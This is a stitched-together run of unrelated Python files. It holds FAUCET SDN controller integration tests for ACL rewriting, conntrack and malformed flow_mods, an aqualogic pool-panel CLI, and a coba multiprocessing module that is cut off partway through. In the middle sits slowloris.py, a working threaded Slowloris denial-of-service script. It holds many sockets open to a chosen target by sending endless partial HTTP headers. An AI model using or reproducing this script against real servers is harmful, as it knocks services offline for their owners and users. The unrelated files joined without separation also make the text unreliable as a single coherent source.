OVERRIDE_MAC = override_mac()
def rewrite_mac(): # pylint: disable=no-method-argument,no-self-use
return '0e:00:00:00:00:03'
REWRITE_MAC = rewrite_mac()
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "%s"
actions:
allow: 1
output:
- set_fields:
- eth_dst: "%s"
- rule:
actions:
allow: 1
""" % (override_mac(), rewrite_mac())
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expect to see the rewritten mac address.
tcpdump_filter = ('icmp and ether dst %s' % self.REWRITE_MAC)
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), self.OVERRIDE_MAC)),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
timeout=5, packets=1)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
def verify_dest_rewrite(self, source_host, overridden_host, rewrite_host, tcpdump_host):
overridden_host.setMAC(self.OVERRIDE_MAC)
rewrite_host.setMAC(self.REWRITE_MAC)
rewrite_host.cmd('arp -s %s %s' % (overridden_host.IP(), overridden_host.MAC()))
rewrite_host.cmd(' '.join((self.FPINGS_ARGS_ONE, overridden_host.IP())))
self.wait_until_matching_flow(
{'dl_dst': self.REWRITE_MAC},
table_id=self._ETH_DST_TABLE,
actions=['OUTPUT:%u' % self.port_map['port_3']])
tcpdump_filter = ('icmp and ether src %s and ether dst %s' % (
source_host.MAC(), rewrite_host.MAC()))
tcpdump_txt = self.tcpdump_helper(
tcpdump_host, tcpdump_filter, [
lambda: source_host.cmd(
'arp -s %s %s' % (rewrite_host.IP(), overridden_host.MAC())),
# this will fail if no reply
lambda: self.one_ipv4_ping(
source_host, rewrite_host.IP(), require_host_learned=False)],
timeout=3, packets=1)
# ping from h1 to h2.mac should appear in third host, and not second host, as
# the acl should rewrite the dst mac.
self.assertFalse(re.search(
'%s: ICMP echo request' % rewrite_host.IP(), tcpdump_txt))
def test_switching(self):
"""Tests that a acl can rewrite the destination mac address,
and the packet will only go out the port of the new mac.
(Continues through faucet pipeline)
"""
source_host, overridden_host, rewrite_host = self.hosts_name_ordered()[0:3]
self.verify_dest_rewrite(
source_host, overridden_host, rewrite_host, overridden_host)
class FaucetSetFieldsTest(FaucetUntaggedTest):
# A generic test to verify that a flow will set fields specified for
# matching packets
OUTPUT_MAC = '0f:00:12:23:48:03'
SRC_MAC = '0f:12:00:00:00:ff'
IP_DSCP_VAL = 46
# this is the converted DSCP value that is displayed
NW_TOS_VAL = 184
IPV4_SRC_VAL = "192.0.2.0"
IPV4_DST_VAL = "198.51.100.0"
# ICMP echo request
ICMPV4_TYPE_VAL = 8
UDP_SRC_PORT = 68
UDP_DST_PORT = 67
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
eth_type: 0x0800
actions:
allow: 1
output:
set_fields:
- ipv4_src: '%s'
- ipv4_dst: '%s'
- ip_dscp: %d
- rule:
eth_type: 0x0800
ip_proto: 1
actions:
allow: 1
output:
set_fields:
- icmpv4_type: %d
""" % (IPV4_SRC_VAL, IPV4_DST_VAL, IP_DSCP_VAL, ICMPV4_TYPE_VAL)
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_set_fields_generic_udp(self):
# Send a basic UDP packet through the faucet pipeline and verify that
# the expected fields were updated via tcpdump output
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.OUTPUT_MAC)
# scapy command to create and send a UDP packet
scapy_pkt = self.scapy_base_udp(
self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
dest_host.IP(), self.UDP_DST_PORT, self.UDP_SRC_PORT,
dst=self.OUTPUT_MAC)
tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host has the
# overwritten values
self.assertTrue(
re.search("%s.%s > %s.%s" % (self.IPV4_SRC_VAL, self.UDP_SRC_PORT,
self.IPV4_DST_VAL, self.UDP_DST_PORT),
tcpdump_txt))
# check the packet's converted dscp value
self.assertTrue(re.search("tos %s" % hex(self.NW_TOS_VAL), tcpdump_txt))
def test_set_fields_icmp(self):
# Send a basic ICMP packet through the faucet pipeline and verify that
# the expected fields were updated via tcpdump output
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.OUTPUT_MAC)
# scapy command to create and send an ICMP packet
scapy_pkt = self.scapy_icmp(
self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
dest_host.IP(), dst=self.OUTPUT_MAC)
tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host has been
# overwritten to be an ICMP echo request
self.assertTrue(re.search("ICMP echo request", tcpdump_txt))
def test_untagged(self):
pass
class FaucetOrderedSetFieldsTest(FaucetUntaggedTest):
# A generic test to verify that a flow will set fields specified for
# matching packets
OUTPUT_MAC = '0f:00:12:23:48:03'
SRC_MAC = '0f:12:00:00:00:ff'
IP_DSCP_VAL = 46
# this is the converted DSCP value that is displayed
NW_TOS_VAL = 184
IPV4_SRC_VAL = "192.0.2.0"
IPV4_DST_VAL = "198.51.100.0"
# ICMP echo request
ICMPV4_TYPE_VAL = 8
UDP_SRC_PORT = 68
UDP_DST_PORT = 67
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
eth_type: 0x0800
actions:
allow: 1
output:
- set_fields:
- ipv4_src: '%s'
- ipv4_dst: '%s'
- ip_dscp: %d
- rule:
eth_type: 0x0800
ip_proto: 1
actions:
allow: 1
output:
- set_fields:
- icmpv4_type: %d
""" % (IPV4_SRC_VAL, IPV4_DST_VAL, IP_DSCP_VAL, ICMPV4_TYPE_VAL)
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_set_fields_generic_udp(self):
# Send a basic UDP packet through the faucet pipeline and verify that
# the expected fields were updated via tcpdump output
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.OUTPUT_MAC)
# scapy command to create and send a UDP packet
scapy_pkt = self.scapy_base_udp(
self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
dest_host.IP(), self.UDP_DST_PORT, self.UDP_SRC_PORT,
dst=self.OUTPUT_MAC)
tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host has the
# overwritten values
self.assertTrue(
re.search("%s.%s > %s.%s" % (self.IPV4_SRC_VAL, self.UDP_SRC_PORT,
self.IPV4_DST_VAL, self.UDP_DST_PORT),
tcpdump_txt))
# check the packet's converted dscp value
self.assertTrue(re.search("tos %s" % hex(self.NW_TOS_VAL), tcpdump_txt))
def test_set_fields_icmp(self):
# Send a basic ICMP packet through the faucet pipeline and verify that
# the expected fields were updated via tcpdump output
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.OUTPUT_MAC)
# scapy command to create and send an ICMP packet
scapy_pkt = self.scapy_icmp(
self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
dest_host.IP(), dst=self.OUTPUT_MAC)
tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host has been
# overwritten to be an ICMP echo request
self.assertTrue(re.search("ICMP echo request", tcpdump_txt))
def test_untagged(self):
pass
class FaucetConntrackMatchTest(FaucetUntaggedTest):
"""Test that untracked TCP packets can be matched with conntrack and blocked"""
SOFTWARE_ONLY = True
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
eth_type: 0x0800
ip_proto: 6
ct_state: 0/0x20
actions:
allow: 0
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untracked_tcp_blocked(self):
self.wait_until_matching_flow(
{'ct_state': '0/0x20',
'eth_type': 0x0800,
'ip_proto': 6},
table_id=self._PORT_ACL_TABLE)
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
tcpdump_filter = ('tcp and port 1024')
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(f"nc -w 1 {second_host.IP()} 1024")])
self.assertNotIn(f"{second_host.IP()}.1024: Flags [S]", tcpdump_txt)
self.wait_nonzero_packet_count_flow(
{'ct_state': '0/0x20',
'eth_type': 0x0800,
'ip_proto': 6},
table_id=self._PORT_ACL_TABLE)
class FaucetConntrackCommitTest(FaucetUntaggedTest):
"""Test that new TCP flows can be matched/tracked and commited to conntrack"""
SOFTWARE_ONLY = True
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
eth_type: 0x0800
ip_proto: 6
ct_state: 0/0x20
actions:
ct:
table: 0
zone: 1
- rule:
eth_type: 0x0800
ip_proto: 6
ct_state: 0x21/0x21
actions:
ct:
flags: 1
table: 1
zone: 1
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_commit_tracked_tcp(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
tcpdump_filter = ('tcp and port 1024')
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(f"nc -w 1 {second_host.IP()} 1024")])
self.wait_nonzero_packet_count_flow(
{'ct_state': '0/0x20',
'eth_type': 0x0800,
'ip_proto': 6},
actions=['NX_CT: {flags: 0, zone: [1..17], table: 0, alg: 0, actions: []}'],
table_id=self._PORT_ACL_TABLE)
self.wait_nonzero_packet_count_flow(
{'ct_state': '0x21/0x21',
'eth_type': 0x0800,
'ip_proto': 6},
actions=['NX_CT: {flags: 1, zone: [1..17], table: 1, alg: 0, actions: []}'],
table_id=self._PORT_ACL_TABLE)
self.assertIn(f"{second_host.IP()}.1024: Flags [S]", tcpdump_txt)
class FaucetConntrackClearTest(FaucetUntaggedTest):
"""Verify clear flag can be set in CT action"""
SOFTWARE_ONLY = True
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acl_in: 2
acls:
1:
- rule:
eth_type: 0x0800
ip_proto: 6
ct_state: 0/0x20
actions:
ct:
table: 0
zone: 1
- rule:
eth_type: 0x0800
ip_proto: 6
ct_state: 0x21/0x21
actions:
ct:
flags: 1
table: 1
zone: 1
- rule:
actions:
allow: 1
2:
- rule:
eth_type: 0x0800
ip_proto: 6
ct_state: 0x20/0x20
actions:
ct:
clear: true
allow: 1
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
class FaucetConntrackNATTest(FaucetUntaggedTest):
"""Test that conntrack NAT action rewrites source IP address"""
SOFTWARE_ONLY = True
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
eth_type: 0x0800
ip_proto: 6
actions:
ct:
flags: 1
table: 1
zone: 1
nat:
flags: 1
range_ipv4_min: 192.0.2.250
range_ipv4_max: 192.0.2.250
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_nat_tcp(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
tcpdump_filter = ('tcp and port 1024')
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(f"nc -w 1 {second_host.IP()} 1024")])
tcpdump_regex = re.escape("192.0.2.250.") + r"\d+" + \
re.escape(f" > {second_host.IP()}.1024: Flags [S]")
self.assertRegex(tcpdump_txt, tcpdump_regex)
class FaucetDscpMatchTest(FaucetUntaggedTest):
# Match all packets with this IP_DSP and eth_type, based on the ryu API def
# e.g {"ip_dscp": 3, "eth_type": 2048}
# Note: the ip_dscp field is translated to nw_tos in OpenFlow 1.0:
# see https://tools.ietf.org/html/rfc2474#section-3
IP_DSCP_MATCH = 46
ETH_TYPE = 2048
SRC_MAC = '0e:00:00:00:00:ff'
DST_MAC = '0e:00:00:00:00:02'
REWRITE_MAC = '0f:00:12:23:48:03'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
ip_dscp: %d
dl_type: 0x800
actions:
allow: 1
output:
set_fields:
- eth_dst: "%s"
- rule:
actions:
allow: 1
""" % (IP_DSCP_MATCH, REWRITE_MAC)
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# Tests that a packet with an ip_dscp field will be appropriately
# matched and proceeds through the faucet pipeline. This test verifies
# that packets with the dscp field can have their eth_dst field modified
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.REWRITE_MAC)
self.wait_until_matching_flow(
{'ip_dscp': self.IP_DSCP_MATCH,
'eth_type': self.ETH_TYPE},
table_id=self._PORT_ACL_TABLE)
# scapy command to create and send a packet with the specified fields
scapy_pkt = self.scapy_dscp(self.SRC_MAC, self.DST_MAC, 184,
source_host.defaultIntf())
tcpdump_filter = "ether dst %s" % self.REWRITE_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host is from the
# source MAC address
self.assertTrue(re.search("%s > %s" % (self.SRC_MAC, self.REWRITE_MAC),
tcpdump_txt))
class FaucetOrderedDscpMatchTest(FaucetUntaggedTest):
# Match all packets with this IP_DSP and eth_type, based on the ryu API def
# e.g {"ip_dscp": 3, "eth_type": 2048}
# Note: the ip_dscp field is translated to nw_tos in OpenFlow 1.0:
# see https://tools.ietf.org/html/rfc2474#section-3
IP_DSCP_MATCH = 46
ETH_TYPE = 2048
SRC_MAC = '0e:00:00:00:00:ff'
DST_MAC = '0e:00:00:00:00:02'
REWRITE_MAC = '0f:00:12:23:48:03'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
ip_dscp: %d
dl_type: 0x800
actions:
allow: 1
output:
- set_fields:
- eth_dst: "%s"
- rule:
actions:
allow: 1
""" % (IP_DSCP_MATCH, REWRITE_MAC)
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# Tests that a packet with an ip_dscp field will be appropriately
# matched and proceeds through the faucet pipeline. This test verifies
# that packets with the dscp field can have their eth_dst field modified
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.REWRITE_MAC)
self.wait_until_matching_flow(
{'ip_dscp': self.IP_DSCP_MATCH,
'eth_type': self.ETH_TYPE},
table_id=self._PORT_ACL_TABLE)
# scapy command to create and send a packet with the specified fields
scapy_pkt = self.scapy_dscp(self.SRC_MAC, self.DST_MAC, 184,
source_host.defaultIntf())
tcpdump_filter = "ether dst %s" % self.REWRITE_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host is from the
# source MAC address
self.assertTrue(re.search("%s > %s" % (self.SRC_MAC, self.REWRITE_MAC),
tcpdump_txt))
@unittest.skip('use_idle_timeout unreliable')
class FaucetWithUseIdleTimeoutTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
timeout: 1
use_idle_timeout: True
""" + CONFIG_BOILER_UNTAGGED
def wait_for_host_removed(self, host, in_port, timeout=5):
for _ in range(timeout):
if not self.host_learned(host, in_port=in_port, timeout=1):
return
self.fail('host %s still learned' % host)
def wait_for_flowremoved_msg(self, src_mac=None, dst_mac=None, timeout=30):
pattern = "OFPFlowRemoved"
mac = None
if src_mac:
pattern = "OFPFlowRemoved(.*)'eth_src': '%s'" % src_mac
mac = src_mac
if dst_mac:
pattern = "OFPFlowRemoved(.*)'eth_dst': '%s'" % dst_mac
mac = dst_mac
for _ in range(timeout):
for _, debug_log_name in self._get_ofchannel_logs():
with open(debug_log_name, encoding='utf-8') as debug_log:
debug = debug_log.read()
if re.search(pattern, debug):
return
time.sleep(1)
self.fail('Not received OFPFlowRemoved for host %s' % mac)
def wait_for_host_log_msg(self, host_mac, msg):
host_log_re = r'.*%s %s.*' % (msg, host_mac)
self.wait_until_matching_lines_from_faucet_log_files(host_log_re)
def test_untagged(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[:2]
self.swap_host_macs(first_host, second_host)
for host, port in (
(first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])):
self.wait_for_flowremoved_msg(src_mac=host.MAC())
self.require_host_learned(host, in_port=int(port))
@unittest.skip('use_idle_timeout unreliable')
class FaucetWithUseIdleTimeoutRuleExpiredTest(FaucetWithUseIdleTimeoutTest):
def test_untagged(self):
"""Host that is actively sending should have its dst rule renewed as the
rule expires. Host that is not sending expires as usual.
"""
self.ping_all_when_learned()
first_host, second_host, third_host, fourth_host = self.hosts_name_ordered()
self.host_ipv4_alias(first_host, ipaddress.ip_interface('10.99.99.1/24'))
first_host.cmd('arp -s %s %s' % (second_host.IP(), second_host.MAC()))
first_host.cmd('timeout 120s ping -I 10.99.99.1 %s &' % second_host.IP())
for host in (second_host, third_host, fourth_host):
self.host_drop_all_ips(host)
self.wait_for_host_log_msg(first_host.MAC(), 'refreshing host')
self.assertTrue(self.host_learned(
first_host, in_port=int(self.port_map['port_1'])))
for host, port in (
(second_host, self.port_map['port_2']),
(third_host, self.port_map['port_3']),
(fourth_host, self.port_map['port_4'])):
self.wait_for_flowremoved_msg(src_mac=host.MAC())
self.wait_for_host_log_msg(host.MAC(), 'expiring host')
self.wait_for_host_removed(host, in_port=int(port))
class FaucetDisconnectTest(FaucetUntaggedTest):
"""Test that switch works properly after repeated disconnections
caused by DPID mismatch"""
def update_config(self, dpid):
"""Update config with good/bad DPID"""
conf = self._get_faucet_conf()
conf['dps'][self.DP_NAME]['dp_id'] = int(dpid)
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=False)
def test_untagged(self):
"""Run untagged test after disconnects and config update"""
# We update the config with a bad DPID and then wait for
# 'unknown datapath' messages, indicating switch connections that
# FAUCET has rejected. The switch should see them as
# 'connection reset by peer'.
mask = int(16 * 'f', 16)
bad_dpid = (int(self.dpid) + 0xdeadbeef) & mask
self.update_config(dpid=bad_dpid)
self.wait_until_matching_lines_from_faucet_log_files(
r'.*ERROR.*unknown datapath', timeout=60, count=4)
self.update_config(dpid=self.dpid)
super().test_untagged()
class FaucetBadFlowModTest(FaucetUntaggedTest):
"""Test that switch and FAUCET still work after we send some bad flow_mods"""
def base_flow_mod(self):
"""Return a base flow mod that we mess with"""
return {'dpid': self.dpid,
'cookie': 0,
'cookie_mask': 0,
'table_id': 0,
'idle_timeout': 29,
'hard_timeout': 91,
'flags': 1,
'priority': 1,
'match': {'in_port': 1},
'actions': [{
'type': 'OUTPUT',
'port': 2}]}
# For now, the flow_mods are reasonably well-formed but with
# parameters that are incorrect for the switch and for FAUCET
def bad_dpid(self):
"""Return a random, bad dpid parameter"""
mask = int(16 * 'f', 16)
dpid = (int(self.dpid) + random.randint(0, 1 << 63)) & mask
return {'dpid': dpid}
@staticmethod
def bad_table():
"""Return a bad table ID parameter"""
# This should be higher than FAUCET's max table ID
bad_table_start = 32
return {'table_id': random.randint(bad_table_start, 100)}
def bad_port(self):
"""Return a (hopefully very) bad port number"""
max_port = max(self.port_map.values())
offset = random.randint(0x1000, 0xE0000000)
mask = 0xEFFFFFFF
return (max_port + offset) & mask
def bad_match(self):
"""Return a bad match field"""
matches = (
# Bad input port
{'in_port': self.bad_port()},
# IPv4 (broadcast) src with bad ('reserved') ethertype
{'nw_src': '255.255.255.255', 'dl_type': 0xFFFF},
# IPv4 with IPv6 ethertype:
{'nw_src': '1.2.3.4', 'dl_type': 0x86DD},
# IPv4 address as IPv6 dst
{'ipv6_dst': '1.2.3.4', 'dl_type': 0x86DD},
# IPv6 dst with Bad/reserved ip_proto
{'ipv6_dst': '2001::aaaa:bbbb:cccc:1111', 'ip_proto': 255},
# Destination port but no transport protocol
{'tp_dst': 80},
# ARP opcode on non-ARP packetx
{'arp_op': 0x3, 'dl_type': 0x1234})
match = random.sample(matches, 1)[0]
return {'match': match}
def bad_actions(self, count=1):
"""Return a questionable actions parameter"""
actions = (
{'type': 'OUTPUT', 'port': self.bad_port()},
{'type': 'PUSH_MPLS', 'ethertype': 0x8BAD},
{'type': 'SET_QUEUE', 'queue_id':
random.randint(0x8000, 0xFFFFFFFF)})
return {'actions': random.sample(actions, count)}
# Possible options for bad parameters
bad_options = ('dpid', 'table', 'match', 'actions')
def bad_flow_mod(self):
"""Return a flow mod with some bad parameters"""
flow_mod = self.base_flow_mod()
# Add two or more bad options
options = random.sample(self.bad_options,
random.randint(2, len(self.bad_options)))
for option in options:
param = getattr(self, 'bad_%s' % option)()
flow_mod.update(param)
return flow_mod
def send_flow_mod(self, flow_mod, timeout=5):
"""Send flow_mod to switch via ofctl"""
int_dpid = mininet_test_util.str_int_dpid(self.dpid)
return self._ofctl_post(int_dpid, 'stats/flowentry/modify',
timeout=timeout, params=flow_mod)
def tearDown(self, ignore_oferrors=True):
"""Ignore OF errors on teardown"""
oferrors = super().tearDown(ignore_oferrors)
oferrors = re.findall(r'type: (\w+)', oferrors)
counter = collections.Counter(oferrors)
error('Ignored OF error count: %s\n' % dict(counter))
# TODO: ensure at least one error is always generated.
# pylint: disable=arguments-differ
def test_untagged(self, count=10):
"""Send a bunch of bad flow mods, then verify connectivity"""
for _ in range(count):
flow_mod = self.bad_flow_mod()
error('sending bad flow_mod', flow_mod, '\n')
self.send_flow_mod(flow_mod)
self.ping_all_when_learned()
class FaucetUntaggedMorePortsBase(FaucetUntaggedTest):
"""Base class for untagged test with more ports"""
# pylint: disable=invalid-name
N_UNTAGGED = 16 # Maximum number of ports to test
EVENT_LOGGER_TIMEOUT = 180 # Timeout for event logger process
# Config lines for additional ports
CONFIG_EXTRA_PORT = """
{port}:
native_vlan: 100""" + "\n"
def pre_start_net(self):
"""Extend config with more ports if needed"""
self.assertTrue(self.CONFIG.endswith(CONFIG_BOILER_UNTAGGED))
# We know how to extend the config for more ports
base_port_count = len(re.findall('port', CONFIG_BOILER_UNTAGGED))
ports = self.topo.dpid_ports(self.dpid)
for port in ports[base_port_count:]:
self.CONFIG += self.CONFIG_EXTRA_PORT.format(port=port)
super()._init_faucet_config()
def setUp(self):
"""Make sure N_UNTAGGED doesn't exceed hw port count"""
if self.config and self.config.get('hw_switch', False):
self.N_UNTAGGED = min(len(self.config['dp_ports']),
self.N_UNTAGGED)
error('(%d ports) ' % self.N_UNTAGGED)
super().setUp()
class FaucetSingleUntagged32PortTest(FaucetUntaggedMorePortsBase):
"""Untagged test with up to 32 ports"""
# pylint: disable=invalid-name
N_UNTAGGED = 32 # Maximum number of ports to test
@unittest.skip('slow and potentially unreliable on travis')
class FaucetSingleUntagged48PortTest(FaucetUntaggedMorePortsBase):
"""Untagged test with up to 48 ports"""
# pylint: disable=invalid-name
N_UNTAGGED = 48 # Maximum number of ports to test
EVENT_LOGGER_TIMEOUT = 360 # Timeout for event logger process
|
slowloris.py | #!/usr/bin/env https://github.com/Tandelajr/mr.tandela
# MIT License
#
# Copyright (C) 2020, Entynetproject. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import random
import time
import socket
from threading import Thread
# Import modules for SLOWLORIS flood
import tools.randomData as randomData
def SLOWLORIS_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
target_ip = target.split(":")[0]
target_port = int(target.split(":")[1])
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting SLOWLORIS attack...")
threads_list = []
# SLOWLORIS flood
def slowloris_flood():
global FINISH
# Init socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(4)
sock.connect((target_ip, target_port))
sock.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))
sock.send("User-Agent: {}\r\n".format(randomData.random_useragent()).encode("utf-8"))
sock.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
while not FINISH:
if not FINISH:
# Packet
try:
sock.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8"))
except socket.error:
print("\033[1;31m"+"[-]"+"\033[0m"+" Failed to create socket!")
else:
print("\033[1;34m"+"[*]"+"\033[0m"+" Sending packets to " + target + "...")
# Start threads
for thread in range(0, threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting thread " + str(thread) + "...")
t = Thread(target = slowloris_flood)
t.start()
threads_list.append(t)
# Sleep selected seconds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;77m"+"[i]"+"\033[0m"+" Attack completed.")
|
cli.py | """aqualogic command line test app."""
import threading
import logging
import sys
from core import AquaLogic
from states import States
logging.basicConfig(level=logging.INFO)
def _data_changed(panel):
print('Pool Temp: {}'.format(panel.pool_temp))
print('Air Temp: {}'.format(panel.air_temp))
print('Pump Speed: {}'.format(panel.pump_speed))
print('Pump Power: {}'.format(panel.pump_power))
print('States: {}'.format(panel.states()))
if panel.get_state(States.CHECK_SYSTEM):
print('Check System: {}'.format(panel.check_system_msg))
if len(sys.argv) == 2:
print('Connecting to {}...'.format(sys.argv[1]))
elif len(sys.argv) == 3:
print('Connecting to {}:{}...'.format(sys.argv[1], sys.argv[2]))
else:
print('Usage: cli [host] [port]')
print(' [serial port]')
quit()
PANEL = AquaLogic()
if len(sys.argv) == 2:
PANEL.connect_serial(sys.argv[1])
else:
PANEL.connect(sys.argv[1], int(sys.argv[2]))
print('Connected!')
print('To toggle a state, type in the State name, e.g. LIGHTS')
READER_THREAD = threading.Thread(target=PANEL.process, args=[_data_changed])
READER_THREAD.start()
while True:
LINE = input()
try:
STATE = States[LINE]
PANEL.set_state(STATE, not PANEL.get_state(STATE))
except KeyError:
print('Invalid State name {}'.format(LINE))
|
multiprocessing.py | from threading import Thread
from multiprocessing import Manager, Queue, Lock, Condition, Semaphore
from typing import Iterable, Any, Dict
from coba.utilities import coba_exit
from coba.contexts import CobaContext, ConcurrentCacher, Logger, Cacher
from coba.pipes import Pipes, Filter, Sink, QueueIO, Multiprocessor, Foreach
class CobaMultiprocessor(Filter[Iterable[Any], Iterable[Any]]):
class PipeStderr(Sink[Any]):
def write(self, item: Any) -> None:
if isinstance(item,tuple):
CobaContext.logger.log(item[2])
else:
CobaContext.logger.log(item)
class ProcessFilter:
def __init__(self, filter: Filter, logger: Logger, cacher: Cacher, store: Dict[str,Any], logger_sink: Sink) -> None:
self._filter = filter
self._logger = logger
self._cacher = cacher
self._store = store
self._logger_sink = logger_sink
def filter(self, item: Any) -> Any:
#placing this here means this is set inside the process
CobaContext.logger = self._logger
CobaContext.cacher = self._cacher
CobaContext.store = self._store
#at this point logger has been marshalled so we can
#modify it without affecting the base process logger
CobaContext.logger.sink = self._logger_sink
try:
return self._filter.filter(item)
except Exception as e:
CobaContext.logger.log(e)
def __init__(self, filter: Filter, processes=1, maxtasksperchild=0) -> None:
self._filter = filter
self._processes = processes
